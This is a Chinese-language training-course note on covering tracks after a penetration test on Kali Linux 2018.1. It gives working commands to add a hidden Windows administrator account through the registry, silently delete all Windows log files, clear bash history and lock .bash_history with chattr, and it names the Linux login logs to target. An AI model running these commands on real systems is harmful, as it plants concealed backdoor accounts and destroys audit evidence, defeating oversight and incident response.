Kali Linux渗透测试 049 清除痕迹

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. 清除渗透攻击痕迹

1.清除渗透攻击痕迹

---

• 最多也只是清除本地记录，如果有日志服务器的话还是会被记录下所有操作

• windows 系统

  •禁止在登陆界面显示新建账号
  •REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersio\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0
  •del %WINDIR%\*.log /a/s/q/f
  •History
  •日志
  •auth.log / secure
  •btmp / wtmp
  •lastlog / faillog
  •其他日志和 HIDS 等
  
  
  # 控制系统之后，新建账号并添加管理员组
  C:\>net user user4 123456 /add
  命令成功完成。
  C:\>net localgroup administrators user4 /add
  命令成功完成。
  # 这样开机登录的界面会显示这个账户
  # 可以通过添加注册表来隐藏
  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v user4 /T REG_DWORD /D 0
  C:\>REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v user4 /T REG_DWORD /D 0
  操作成功结束
  # 但是使用 net user 还是可以查看到这个账户
  
  
  # 强制静默删除日志
  C:\>del %WINDIR%\*.log /a/s/q/f
  

• Linux 系统

  root@kali:~# history
  # history 记录保存在 .bash_history
  root@kali:~# ls -l .bash_history 
      -rw------- 1 root root 15418 3月   4 00:28 .bash_history
  # 擦除痕迹
  root@kali:~# history -c
  
  root@kali:~# lsattr
      --------------e---- ./Downloads
      --------------e---- ./Desktop
      --------------e---- ./testDir
      --------------e---- ./Pictures
      --------------e---- ./Public
      --------------e---- ./vmware-tools-patches
      --------------e---- ./Videos
      --------------e---- ./Documents
      --------------e---- ./Music
      --------------e---- ./Templates
  root@kali:~# chattr -h
      Usage: chattr [-pRVf] [-+=aAcCdDeijPsStTu] [-v version] files...
  
  # 修改文件属性让其无法被写入数据
  root@kali:~# touch 456.txt
  root@kali:~# lsattr 456.txt 
      --------------e---- 456.txt
  root@kali:~# ifconfig > 456.txt 
  root@kali:~# chattr +i 456.txt 
  root@kali:~# lsattr 456.txt 
      ----i---------e---- 456.txt
  root@kali:~# ifconfig > 456.txt 
      -bash: 456.txt: 不允许的操作
  
  # 修改 .bash_history，让其无法被写入，会变成只读文件
  root@kali:~# chattr +i .bash_history
  
  
  # 日志记录
  •auth.log / secure
  •btmp / wtmp
  •lastlog / faillog
  
  root@kali:~# cat /var/log/auth.log
  root@kali:~# cat /var/log/wtmp
  root@kali:~# lastlog
      用户名           端口     来自             最后登陆时间
      root             pts/3    172.16.10.1      日 3月  4 02:30:00 -0500 2018
      daemon                                     **从未登录过**
      bin                                        **从未登录过**
      sys                                        **从未登录过**
      sync                                       **从未登录过**
      games                                      **从未登录过**
      man                                        **从未登录过**
      lp                                         **从未登录过**
      mail                                       **从未登录过**
      news                                       **从未登录过**
      uucp                                       **从未登录过**
      proxy                                      **从未登录过**
      www-data                                   **从未登录过**
      backup                                     **从未登录过**
      list                                       **从未登录过**
      irc                                        **从未登录过**
      gnats                                      **从未登录过**
      nobody                                     **从未登录过**